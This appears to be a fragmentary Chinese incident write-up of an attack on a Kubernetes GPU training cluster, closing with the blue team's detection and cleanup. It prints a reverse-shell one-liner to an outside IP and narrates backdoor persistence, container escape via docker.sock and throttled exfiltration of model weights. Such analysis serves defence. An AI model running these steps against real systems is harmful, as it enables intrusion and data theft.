curl拉取远程脚本并执行,建立首个立足点。该账户具备sudo权限,且与K8s集群API Server处于同一内网段。bash -i >& /dev/tcp/185.x.x.x/8443 0>&1建立反弹Shell,随后下载SNOWLIGHT脚本。该脚本为Bash类型后门,通过nohup守护进程驻留,每300秒向C2心跳。脚本内置AES加密通信、进程名伪装为kworker/u8:2,并写入/etc/rc.local实现开机自启。同时修改.bashrc注入alias,劫持ps、netstat等命令输出以规避排查。kubectl凭证,枚举K8s集群Pod列表,发现训练任务容器以privileged: true运行。通过kubectl exec进入容器后,利用挂载的/var/run/docker.sock实现容器逃逸,在宿主机上创建特权容器并挂载宿主机根目录,获取训练数据存储卷的读写权限。随后在多个GPU节点上重复植入SNOWLIGHT脚本,形成持久化控制。/mnt/training-data下的模型权重文件(约2.3TB),使用tar分卷压缩后通过rclone上传至境外对象存储。为规避流量检测,分卷大小设置为500MB,传输限速10MB/s,持续约6小时。期间通过SNOWLIGHT脚本的C2通道接收指令,动态调整传输策略。curl外联及nohup进程创建。蓝队立即隔离该节点,通过Sysmon日志回溯发现SSH爆破痕迹与SNOWLIGHT脚本落地。进一步排查K8s审计日志,确认容器逃逸路径。蓝队同步封禁C2 IP、重置所有节点凭证、清除SNOWLIGHT进程及自启项,并对全集群GPU节点进行YARA扫描,确认无残留后恢复业务。kworker伪装进程名、AES心跳通信),并监控rc.local与.bashrc异常修改